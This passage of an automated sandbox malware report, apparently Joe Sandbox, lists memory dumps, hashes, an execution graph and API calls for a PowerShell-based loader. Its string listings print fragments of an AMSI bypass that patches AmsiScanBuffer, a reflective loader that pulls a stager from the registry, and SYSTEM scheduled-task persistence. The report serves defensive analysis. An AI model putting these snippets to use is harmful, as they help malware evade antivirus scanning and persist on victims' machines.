        • Associated: 00000013.00000002.3059184218.0000013F08EA5000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3059730149.0000013F08EB0000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3060239866.0000013F08EB2000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3060760816.0000013F08EB9000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_19_2_13f08e90000_conhost.jbxd
        Similarity
        • API ID: Heap$Process$AllocFree
        • String ID:
        • API String ID: 756756679-0
        • Opcode ID: 4c9b2301a415d0f0b496c555fe445cf1af4f6cd5e16f1feadd66e218500f58a3
        • Instruction ID: 4705185877040052977e1e6f0db8c71f75b8fe4d5a1e2e2ece074b828ce7a5ba
        • Opcode Fuzzy Hash: 4c9b2301a415d0f0b496c555fe445cf1af4f6cd5e16f1feadd66e218500f58a3
        • Instruction Fuzzy Hash: A3118431A01F8095EA19CBAAA4042997BB6F788FD1F584138EE8E53766DF7CD543C300
        APIs
        Memory Dump Source
        • Source File: 00000013.00000002.3055761550.0000013F08E61000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000013F08E60000, based on PE: true
        • Associated: 00000013.00000002.3055284000.0000013F08E60000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3056628998.0000013F08E75000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3057143026.0000013F08E80000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3057445918.0000013F08E82000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3057817933.0000013F08E89000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_19_2_13f08e60000_conhost.jbxd
        Similarity
        • API ID: Heap$AllocProcess
        • String ID:
        • API String ID: 1617791916-0
        • Opcode ID: 5766f835ea2a456c44b6013e96a3e1eda123ada506de8733bfa06fac8bd4a176
        • Instruction ID: 57a507f5e9bc61601a0db08a182ae8d39cc54173d836c6510bbdb84dd7c5a020
        • Opcode Fuzzy Hash: 5766f835ea2a456c44b6013e96a3e1eda123ada506de8733bfa06fac8bd4a176
        • Instruction Fuzzy Hash: 5DE09231A01A049AF7288FA6D8083893BE2FB8CF26F44C038C90907351EF7D95DAC741
        APIs
        Memory Dump Source
        • Source File: 00000013.00000002.3058635336.0000013F08E91000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000013F08E90000, based on PE: true
        • Associated: 00000013.00000002.3058223651.0000013F08E90000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3059184218.0000013F08EA5000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3059730149.0000013F08EB0000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3060239866.0000013F08EB2000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3060760816.0000013F08EB9000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_19_2_13f08e90000_conhost.jbxd
        Similarity
        • API ID: Heap$AllocProcess
        • String ID:
        • API String ID: 1617791916-0
        • Opcode ID: 5766f835ea2a456c44b6013e96a3e1eda123ada506de8733bfa06fac8bd4a176
        • Instruction ID: 486dbf2a119a27738309918542d65e5ad1d527f92bbfbf537fd17907e4343c62
        • Opcode Fuzzy Hash: 5766f835ea2a456c44b6013e96a3e1eda123ada506de8733bfa06fac8bd4a176
        • Instruction Fuzzy Hash: 00E09231A01A04AAE7188FE6D8083A9BAE2FB9CF05F44C038C90907351EF7D95DAC741
        APIs
        Memory Dump Source
        • Source File: 00000013.00000002.3055761550.0000013F08E61000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000013F08E60000, based on PE: true
        • Associated: 00000013.00000002.3055284000.0000013F08E60000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3056628998.0000013F08E75000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3057143026.0000013F08E80000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3057445918.0000013F08E82000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3057817933.0000013F08E89000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_19_2_13f08e60000_conhost.jbxd
        Similarity
        • API ID: Heap$AllocProcess
        • String ID:
        • API String ID: 1617791916-0
        • Opcode ID: edf732acfe8a8b1979705777c81849703b5d4d240706bab5b6d58847dad35a27
        • Instruction ID: 0602284d5fca1330a80f16e5194f0361a6f22db0995db6d14b2bea1fcc96e73c
        • Opcode Fuzzy Hash: edf732acfe8a8b1979705777c81849703b5d4d240706bab5b6d58847dad35a27
        • Instruction Fuzzy Hash: FBE01271A119049BE72C9FA6DC043997BE2FB8CF26F448078C90907711EE3C959AD711
        APIs
        Memory Dump Source
        • Source File: 00000013.00000002.3058635336.0000013F08E91000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000013F08E90000, based on PE: true
        • Associated: 00000013.00000002.3058223651.0000013F08E90000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3059184218.0000013F08EA5000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3059730149.0000013F08EB0000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3060239866.0000013F08EB2000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3060760816.0000013F08EB9000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_19_2_13f08e90000_conhost.jbxd
        Similarity
        • API ID: Heap$AllocProcess
        • String ID:
        • API String ID: 1617791916-0
        • Opcode ID: edf732acfe8a8b1979705777c81849703b5d4d240706bab5b6d58847dad35a27
        • Instruction ID: 94946a16bf9d3971abd78f1840f9ca22ce951c217396a7dba2e5ae8a2797a85c
        • Opcode Fuzzy Hash: edf732acfe8a8b1979705777c81849703b5d4d240706bab5b6d58847dad35a27
        • Instruction Fuzzy Hash: 22E01271A11904ABE71C9FE6DC043A9BAE2FB9CF15F448078C90907311EE3C959AD711
        Memory Dump Source
        • Source File: 00000020.00000002.2454930199.00000000045DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 045DD000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_32_2_45dd000_powershell.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: c44fb274ce14868ea9c95bcb8f27c53da3ea5d8d95758f503f1deb8ca3f1bc63
        • Instruction ID: cce4c4cf4bd91acee9384212ab02f5384f1ae2e31ccf1bd010d575d30e372972
        • Opcode Fuzzy Hash: c44fb274ce14868ea9c95bcb8f27c53da3ea5d8d95758f503f1deb8ca3f1bc63
        • Instruction Fuzzy Hash: 8601806100D3C09FD7128B259C94752BFB8EF83224F09C5DBE8888F193D2696C49D772
        Memory Dump Source
        • Source File: 00000020.00000002.2454930199.00000000045DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 045DD000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_32_2_45dd000_powershell.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 5ace76af94694db0acfe4058b198ce1c2f70ff5f2e91465d21ab4041f3239a9b
        • Instruction ID: 130e766004068d53e2385335fc070382fea0b0b5fa04dcc30714d1c1df2e5fc8
        • Opcode Fuzzy Hash: 5ace76af94694db0acfe4058b198ce1c2f70ff5f2e91465d21ab4041f3239a9b
        • Instruction Fuzzy Hash: 9D0120311043009AD7304E1DED84767BFACFFC5364F08C515DC080B146E279E849D6B1

        Execution Graph

        Execution Coverage:74.6%
        Dynamic/Decrypted Code Coverage:0%
        Signature Coverage:25.7%
        Total number of Nodes:101
        Total number of Limit Nodes:9
        execution_graph 238 401798 241 4017a5 FindResourceA 238->241 242 40179d ExitProcess 241->242 243 4017c5 SizeofResource 241->243 243->242 244 4017d8 LoadResource 243->244 244->242 245 4017e4 LockResource RegOpenKeyExW 244->245 245->242 246 40180b RegSetValueExW 245->246 246->242 247 401822 246->247 259 401868 GetProcessHeap HeapAlloc StrCpyW 247->259 251 401835 252 401674 9 API calls 251->252 253 401841 252->253 306 40112f GetCurrentProcess IsWow64Process 253->306 257 401854 257->242 319 40151a SysAllocString SysAllocString CoInitializeEx 257->319 329 401159 259->329 261 401893 262 4018c5 StrCatW StrCatW 261->262 263 40189d StrCatW 261->263 332 4019e1 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 262->332 264 40112f 2 API calls 263->264 266 4018aa StrCatW StrCatW 264->266 266->262 271 401986 6 API calls 272 4018f0 271->272 273 401986 6 API calls 272->273 274 4018fc 273->274 275 401986 6 API calls 274->275 276 401908 275->276 277 401986 6 API calls 276->277 278 401914 277->278 279 401986 6 API calls 278->279 280 401920 279->280 281 401986 6 API calls 280->281 282 40192c 281->282 283 401986 6 API calls 282->283 284 401938 283->284 285 401986 6 API calls 284->285 286 401944 285->286 287 401986 6 API calls 286->287 288 401950 287->288 289 401986 6 API calls 288->289 290 40195c 289->290 291 401986 6 API calls 290->291 292 401968 291->292 293 401986 6 API calls 292->293 294 401974 293->294 295 401986 6 API calls 294->295 296 401827 295->296 297 401674 SysAllocString SysAllocString CoInitializeEx 296->297 298 401782 297->298 299 4016a7 CoInitializeSecurity 297->299 302 401785 SysFreeString SysFreeString 298->302 300 4016c8 CoCreateInstance 299->300 301 4016bd 299->301 303 4016ea VariantInit 300->303 305 40172d CoUninitialize 300->305 301->300 301->305 302->251 303->305 305->302 307 40114e 306->307 308 4011ad 7 API calls 307->308 309 4014f0 308->309 310 401209 CoInitializeSecurity 308->310 311 4014f3 6 API calls 309->311 312 40122a CoCreateInstance 310->312 313 40121f 310->313 311->257 314 401444 CoUninitialize 312->314 315 40124c VariantInit 312->315 313->312 313->314 314->311 317 40128f 315->317 317->314 318 4013dd VariantInit VariantInit VariantInit 317->318 318->314 320 40154d CoInitializeSecurity 319->320 321 40165f SysFreeString SysFreeString 319->321 322 401563 320->322 323 40156e CoCreateInstance 320->323 321->242 322->323 324 401659 CoUninitialize 322->324 323->324 325 401590 VariantInit 323->325 324->321 326 4015d3 325->326 327 401605 VariantInit 326->327 328 40162b 326->328 327->328 328->324 352 40118e GetModuleHandleA 329->352 331 401178 331->261 355 401000 CryptAcquireContextW 332->355 335 401a37 StrStrIW 337 401a9d 335->337 336 4018d8 345 401986 lstrlenW 336->345 338 401b71 6 API calls 337->338 339 401a57 StrStrIW StrNCatW StrCatW 337->339 341 401b27 StrCatW 337->341 342 401afb StrCatW StrNCatW 337->342 344 401adf StrCatW StrCatW 337->344 338->336 339->337 340 401b41 StrCatW StrStrIW 339->340 340->337 341->337 341->340 343 401b18 StrCatW 342->343 343->341 344->343 358 40104b 345->358 348 4019b3 StrStrIW 349 4018e4 348->349 350 4019bf 348->350 349->271 351 4019c0 StrStrIW 350->351 351->349 351->351 353 4011aa 352->353 354 40119d GetProcAddress 352->354 353->331 354->331 356 401044 355->356 357 401028 CryptGenRandom CryptReleaseContext 355->357 356->335 356->336 357->356 359 401000 3 API calls 358->359 360 401076 359->360 360->348 360->349

        Callgraph

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 61 4011ad-401203 SysAllocString * 6 CoInitializeEx 62 4014f0 61->62 63 401209-40121d CoInitializeSecurity 61->63 64 4014f3-401519 SysFreeString * 6 62->64 65 40122a-401246 CoCreateInstance 63->65 66 40121f-401224 63->66 67 4014e5 65->67 68 40124c-401291 VariantInit 65->68 66->65 66->67 69 4014e8-4014ee CoUninitialize 67->69 71 4014d4 68->71 72 401297-4012ac 68->72 69->64 73 4014d7-4014e3 71->73 72->71 76 4012b2-4012c5 72->76 73->69 78 4014c6 76->78 79 4012cb-4012dd 76->79 80 4014c9-4014d2 78->80 82 4012e3-4012f0 79->82 83 4014b8 79->83 80->73 87 4012f6-401302 82->87 88 4014aa 82->88 85 4014bb-4014c4 83->85 85->80 87->88 93 401308-40131a 87->93 90 4014ad-4014b6 88->90 90->85 93->88 95 401320-401336 93->95 97 40149c 95->97 98 40133c-401352 95->98 99 40149f-4014a8 97->99 102 401358-40136a 98->102 103 40148e 98->103 99->90 106 401480 102->106 107 401370-401383 102->107 104 401491-40149a 103->104 104->99 109 401483-40148c 106->109 111 401472 107->111 112 401389-40139f 107->112 109->104 114 401475-40147e 111->114 117 401464 112->117 118 4013a5-4013b3 112->118 114->109 119 401467-401470 117->119 122 401456 118->122 123 4013b9-4013c7 118->123 119->114 124 401459-401462 122->124 123->122 126 4013cd-4013db 123->126 124->119 126->122 129 4013dd-401440 VariantInit * 3 126->129 130 401444-401446 129->130 130->124 131 401448-401454 130->131 131->124
        APIs
        • SysAllocString.OLEAUT32($rbx-svc64), ref: 004011C2
        • SysAllocString.OLEAUT32(00402234), ref: 004011CC
        • SysAllocString.OLEAUT32(powershell), ref: 004011D8
        • SysAllocString.OLEAUT32(?), ref: 004011E0
        • SysAllocString.OLEAUT32(0040218C), ref: 004011EA
        • SysAllocString.OLEAUT32(SYSTEM), ref: 004011F4
        • CoInitializeEx.OLE32(00000000,00000000), ref: 004011FB
        • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000006,00000003,00000000,00000000,00000000), ref: 00401215
        • CoCreateInstance.OLE32(004020A8,00000000,00000001,00402088,?), ref: 0040123E
        • VariantInit.OLEAUT32(?), ref: 00401250
        • VariantInit.OLEAUT32(?), ref: 004013EA
        • VariantInit.OLEAUT32(?), ref: 004013F0
        • VariantInit.OLEAUT32(?), ref: 00401400
        • CoUninitialize.COMBASE ref: 004014E8
        • SysFreeString.OLEAUT32(?), ref: 004014FA
        • SysFreeString.OLEAUT32(00000000), ref: 004014FD
        • SysFreeString.OLEAUT32(?), ref: 00401502
        • SysFreeString.OLEAUT32(?), ref: 00401507
        • SysFreeString.OLEAUT32(?), ref: 0040150C
        • SysFreeString.OLEAUT32(?), ref: 00401511
        Strings
        Memory Dump Source
        • Source File: 00000022.00000002.2450027885.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_34_2_400000_powershell.jbxd
        Similarity
        • API ID: String$AllocFree$InitVariant$Initialize$CreateInstanceSecurityUninitialize
        • String ID: $rbx-svc32$$rbx-svc64$SYSTEM$powershell
        • API String ID: 3960698109-3701805373
        • Opcode ID: ff7d6058a75d3fd49d40f97f6d914bf38f4691f494542389520dc0ad8fdbed81
        • Instruction ID: 37100555a8a6d5ebab17ddb862eb0107d88f8e52c3f2eb0dc8ef098a6b7a2dd9
        • Opcode Fuzzy Hash: ff7d6058a75d3fd49d40f97f6d914bf38f4691f494542389520dc0ad8fdbed81
        • Instruction Fuzzy Hash: D5C1FC71E00119EFDB00DFA5C988DAEBBB9FF49354B1040A9E905FB2A0DB75AD06CB51

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 152 4017a5-4017bf FindResourceA 153 401862-401867 152->153 154 4017c5-4017d2 SizeofResource 152->154 155 401861 154->155 156 4017d8-4017e2 LoadResource 154->156 155->153 156->155 157 4017e4-401809 LockResource RegOpenKeyExW 156->157 157->155 158 40180b-401820 RegSetValueExW 157->158 158->155 159 401822-401858 call 401868 call 401674 * 2 call 40112f call 4011ad 158->159 159->155 170 40185a-40185c call 40151a 159->170 170->155
        APIs
        • FindResourceA.KERNEL32(00000000,00000065,EXE), ref: 004017B5
        • SizeofResource.KERNEL32(00000000,00000000,?,?,?,?,?,0040179D), ref: 004017C8
        • LoadResource.KERNEL32(00000000,00000000,?,?,?,?,?,0040179D), ref: 004017DA
        • LockResource.KERNEL32(00000000,?,?,?,?,?,0040179D), ref: 004017E5
        • RegOpenKeyExW.ADVAPI32(80000002,SOFTWARE,00000000,000F013F,?,?,?,?,?,?,0040179D), ref: 00401801
        • RegSetValueExW.KERNELBASE(?,$rbx-stager,00000000,00000003,00000000,00000000,?,?,?,?,?,0040179D), ref: 00401818
          • Part of subcall function 00401868: GetProcessHeap.KERNEL32(00000000,00008000,00000000,00000000,00000000,00401827,?,?,?,?,?,0040179D), ref: 00401872
          • Part of subcall function 00401868: HeapAlloc.KERNEL32(00000000,?,?,?,?,?,0040179D), ref: 00401879
          • Part of subcall function 00401868: StrCpyW.SHLWAPI(00000000,00402238), ref: 00401888
          • Part of subcall function 00401868: StrCatW.SHLWAPI(00000000,function Local:Get-Delegate{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$ParameterTypes,[Parameter(Position=1)][Type]), ref: 004018A3
          • Part of subcall function 00401868: StrCatW.SHLWAPI(00000000,[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc2,0x18,0),0,$AmsiScanBufferPtr,8);), ref: 004018BB
          • Part of subcall function 00401868: StrCatW.SHLWAPI(00000000,[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VirtualProtectPtr,$VirtualProtectDelegate).Invoke($AmsiScanBuffe), ref: 004018C3
          • Part of subcall function 00401868: StrCatW.SHLWAPI(00000000,[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(`SOFTWARE`).GetValue(`$rbx-stager`)).EntryPoint.In), ref: 004018CB
          • Part of subcall function 00401868: StrCatW.SHLWAPI(00000000,00402238), ref: 004018CF
          • Part of subcall function 00401674: SysAllocString.OLEAUT32($rbx-svc32), ref: 00401686
          • Part of subcall function 00401674: SysAllocString.OLEAUT32(0040218C), ref: 00401690
          • Part of subcall function 00401674: CoInitializeEx.COMBASE(00000000,00000000), ref: 00401699
          • Part of subcall function 00401674: CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000006,00000003,00000000,00000000,00000000), ref: 004016B3
          • Part of subcall function 00401674: CoCreateInstance.OLE32(004020A8,00000000,00000001,00402088,?), ref: 004016DC
          • Part of subcall function 00401674: VariantInit.OLEAUT32(?), ref: 004016EE
          • Part of subcall function 00401674: CoUninitialize.COMBASE ref: 0040177A
          • Part of subcall function 00401674: SysFreeString.OLEAUT32(?), ref: 0040178C
          • Part of subcall function 00401674: SysFreeString.OLEAUT32(00000000), ref: 0040178F
          • Part of subcall function 0040112F: GetCurrentProcess.KERNEL32(?,00000000,?,?,004018AA,?,?,?,?,?,0040179D), ref: 0040113D
          • Part of subcall function 0040112F: IsWow64Process.KERNEL32(00000000,?,?,004018AA,?,?,?,?,?,0040179D), ref: 00401144
          • Part of subcall function 004011AD: SysAllocString.OLEAUT32($rbx-svc64), ref: 004011C2
          • Part of subcall function 004011AD: SysAllocString.OLEAUT32(00402234), ref: 004011CC
          • Part of subcall function 004011AD: SysAllocString.OLEAUT32(powershell), ref: 004011D8
          • Part of subcall function 004011AD: SysAllocString.OLEAUT32(?), ref: 004011E0
          • Part of subcall function 004011AD: SysAllocString.OLEAUT32(0040218C), ref: 004011EA
          • Part of subcall function 004011AD: SysAllocString.OLEAUT32(SYSTEM), ref: 004011F4
          • Part of subcall function 004011AD: CoInitializeEx.OLE32(00000000,00000000), ref: 004011FB
          • Part of subcall function 004011AD: CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000006,00000003,00000000,00000000,00000000), ref: 00401215
          • Part of subcall function 004011AD: CoCreateInstance.OLE32(004020A8,00000000,00000001,00402088,?), ref: 0040123E
          • Part of subcall function 004011AD: VariantInit.OLEAUT32(?), ref: 00401250
          • Part of subcall function 0040151A: SysAllocString.OLEAUT32($rbx-svc64), ref: 0040152C
          • Part of subcall function 0040151A: SysAllocString.OLEAUT32(0040218C), ref: 00401538
          • Part of subcall function 0040151A: CoInitializeEx.OLE32(00000000,00000000), ref: 0040153F
          • Part of subcall function 0040151A: CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000006,00000003,00000000,00000000,00000000), ref: 00401559
          • Part of subcall function 0040151A: CoCreateInstance.OLE32(004020A8,00000000,00000001,00402088,?), ref: 00401582
          • Part of subcall function 0040151A: VariantInit.OLEAUT32(?), ref: 00401594
        Strings
        Memory Dump Source
        • Source File: 00000022.00000002.2450027885.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_34_2_400000_powershell.jbxd
        Similarity
        • API ID: String$Alloc$Initialize$Resource$CreateInitInstanceProcessSecurityVariant$FreeHeap$CurrentFindLoadLockOpenSizeofUninitializeValueWow64
        • String ID: $rbx-stager$$rbx-svc32$$rbx-svc64$EXE$SOFTWARE
        • API String ID: 2402434814-2001424239
        • Opcode ID: 80d2da82d41cd1101cb0fa336117fbe1f9f1514eb18b9611fb588a91be9c79d8
        • Instruction ID: 66d5473efb4f301b2503ca24c6ba2de9d178356673c05167290160cc1cb4c15a
        • Opcode Fuzzy Hash: 80d2da82d41cd1101cb0fa336117fbe1f9f1514eb18b9611fb588a91be9c79d8
        • Instruction Fuzzy Hash: 541191727003156BEB1527725E8DE6B299D9B85794B14443BBA05F62E2EEB8CD00C1A8

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 190 401000-401026 CryptAcquireContextW 191 401044-40104a 190->191 192 401028-401041 CryptGenRandom CryptReleaseContext 190->192 192->191
        APIs
        • CryptAcquireContextW.ADVAPI32(00401A2F,00000000,Microsoft Base Cryptographic Provider v1.0,00000001,F0000000,00000000,00000000,00000000,00000000,?,00401A2F), ref: 0040101E
        • CryptGenRandom.ADVAPI32(00401A2F,00004000,00000000,?,00401A2F), ref: 0040102D
        • CryptReleaseContext.ADVAPI32(00401A2F,00000000,?,00401A2F), ref: 00401039
        Strings
        • Microsoft Base Cryptographic Provider v1.0, xrefs: 0040100E
        Memory Dump Source
        • Source File: 00000022.00000002.2450027885.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_34_2_400000_powershell.jbxd
        Similarity
        • API ID: Crypt$Context$AcquireRandomRelease
        • String ID: Microsoft Base Cryptographic Provider v1.0
        • API String ID: 1815803762-291530887
        • Opcode ID: 7b900a4f350d734c292f5c1c4b13f0c1982cf59fedc7216eb164ff64d53fea36
        • Instruction ID: b3acd7e835805075c9d1b27062e8bfe6e8ad1c0e86411dcbfca9405e651f33df
        • Opcode Fuzzy Hash: 7b900a4f350d734c292f5c1c4b13f0c1982cf59fedc7216eb164ff64d53fea36
        • Instruction Fuzzy Hash: C9E0E5726002247BEB304B959E8DF8B3A6CDB80654F200036B704F2190D5B08D00D268

        Control-flow Graph

        APIs
        • GetProcessHeap.KERNEL32(00000000,00008000,00000000,00000000,00000000,00401827,?,?,?,?,?,0040179D), ref: 00401872
        • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,0040179D), ref: 00401879
        • StrCpyW.SHLWAPI(00000000,00402238), ref: 00401888
        • StrCatW.SHLWAPI(00000000,function Local:Get-Delegate{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$ParameterTypes,[Parameter(Position=1)][Type]), ref: 004018A3
          • Part of subcall function 0040112F: GetCurrentProcess.KERNEL32(?,00000000,?,?,004018AA,?,?,?,?,?,0040179D), ref: 0040113D
          • Part of subcall function 0040112F: IsWow64Process.KERNEL32(00000000,?,?,004018AA,?,?,?,?,?,0040179D), ref: 00401144
        • StrCatW.SHLWAPI(00000000,[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc2,0x18,0),0,$AmsiScanBufferPtr,8);), ref: 004018BB
        • StrCatW.SHLWAPI(00000000,[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VirtualProtectPtr,$VirtualProtectDelegate).Invoke($AmsiScanBuffe), ref: 004018C3
        • StrCatW.SHLWAPI(00000000,[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(`SOFTWARE`).GetValue(`$rbx-stager`)).EntryPoint.In), ref: 004018CB
        • StrCatW.SHLWAPI(00000000,00402238), ref: 004018CF
        Strings
        • [Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc2,0x18,0),0,$AmsiScanBufferPtr,8);, xrefs: 004018B5
        • [Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(`SOFTWARE`).GetValue(`$rbx-stager`)).EntryPoint.In, xrefs: 004018C5
        • Kernel32Ptr, xrefs: 00401938
        • LoadLibraryPtr, xrefs: 00401944
        • TypeBuilder, xrefs: 004018FC
        • VirtualProtectDelegate, xrefs: 0040192C
        • AmsiScanBufferPtr, xrefs: 00401968
        • AmsiPtr, xrefs: 0040195C
        • ParameterTypes, xrefs: 004018E4
        • NativeMethods, xrefs: 00401908
        • function Local:Get-Delegate{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$ParameterTypes,[Parameter(Position=1)][Type], xrefs: 0040189D
        • Get-Delegate, xrefs: 004018D8
        • [Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$AmsiScanBufferPtr,6);, xrefs: 004018AE
        • VirtualProtectPtr, xrefs: 00401950
        • GetProcAddress, xrefs: 00401914
        • ReturnType, xrefs: 004018F0
        • OldProtect, xrefs: 00401974
        • [Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VirtualProtectPtr,$VirtualProtectDelegate).Invoke($AmsiScanBuffe, xrefs: 004018BD
        • LoadLibraryDelegate, xrefs: 00401920
        Memory Dump Source
        • Source File: 00000022.00000002.2450027885.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_34_2_400000_powershell.jbxd
        Similarity
        • API ID: Process$Heap$AllocCurrentWow64
        • String ID: AmsiPtr$AmsiScanBufferPtr$Get-Delegate$GetProcAddress$Kernel32Ptr$LoadLibraryDelegate$LoadLibraryPtr$NativeMethods$OldProtect$ParameterTypes$ReturnType$TypeBuilder$VirtualProtectDelegate$VirtualProtectPtr$[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(`SOFTWARE`).GetValue(`$rbx-stager`)).EntryPoint.In$[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc2,0x18,0),0,$AmsiScanBufferPtr,8);$[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$AmsiScanBufferPtr,6);$[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VirtualProtectPtr,$VirtualProtectDelegate).Invoke($AmsiScanBuffe$function Local:Get-Delegate{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$ParameterTypes,[Parameter(Position=1)][Type]
        • API String ID: 2666690646-646820343
        • Opcode ID: 3f5c978e97a954265763d819c8a7a71c785032f2f8244d135faac9b6795907b0
        • Instruction ID: f846a874a752e31dd56dc30a4e6b8ff2ba80a14d39c5350a1e27bccbc54df91f
        • Opcode Fuzzy Hash: 3f5c978e97a954265763d819c8a7a71c785032f2f8244d135faac9b6795907b0
        • Instruction Fuzzy Hash: 6D219D9030292067D5163A621A6A92F980E8BC1B46710C03FB9457F7E9DF7D8F038BDE

        Control-flow Graph

        APIs
        • GetProcessHeap.KERNEL32(00000000,00008000,75B12EB0,00000000,00402238), ref: 004019F4
        • HeapAlloc.KERNEL32(00000000), ref: 00401A01
        • GetProcessHeap.KERNEL32(00000000,00004000), ref: 00401A15
        • HeapAlloc.KERNEL32(00000000), ref: 00401A1C
          • Part of subcall function 00401000: CryptAcquireContextW.ADVAPI32(00401A2F,00000000,Microsoft Base Cryptographic Provider v1.0,00000001,F0000000,00000000,00000000,00000000,00000000,?,00401A2F), ref: 0040101E
          • Part of subcall function 00401000: CryptGenRandom.ADVAPI32(00401A2F,00004000,00000000,?,00401A2F), ref: 0040102D
          • Part of subcall function 00401000: CryptReleaseContext.ADVAPI32(00401A2F,00000000,?,00401A2F), ref: 00401039
        • StrStrIW.KERNELBASE(?,004037F8), ref: 00401A46
        • StrStrIW.SHLWAPI(00000002,004037F8), ref: 00401A6D
        • StrNCatW.SHLWAPI(00000000,?,?), ref: 00401A84
        • StrCatW.SHLWAPI(00000000,004037FC), ref: 00401A90
        • StrCatW.SHLWAPI(?,'+[Char](), ref: 00401AE8
        • StrCatW.SHLWAPI(?,?), ref: 00401AF2
        • StrCatW.SHLWAPI(?,'+'), ref: 00401B1C
        • StrCatW.SHLWAPI(00000000,?), ref: 00401B2C
        • StrCatW.SHLWAPI(00000000,004037FC), ref: 00401B47
        • StrStrIW.SHLWAPI(?,004037F8), ref: 00401B61
        • StrCatW.SHLWAPI(00000000,?), ref: 00401B75
        • StrCpyW.SHLWAPI(?,00000000), ref: 00401B7C
        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00401B8A
        • HeapFree.KERNEL32(00000000), ref: 00401B93
        • GetProcessHeap.KERNEL32(00000000,?), ref: 00401B99
        • HeapFree.KERNEL32(00000000), ref: 00401B9C
        Strings
        Memory Dump Source
        • Source File: 00000022.00000002.2450027885.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_34_2_400000_powershell.jbxd
        Similarity
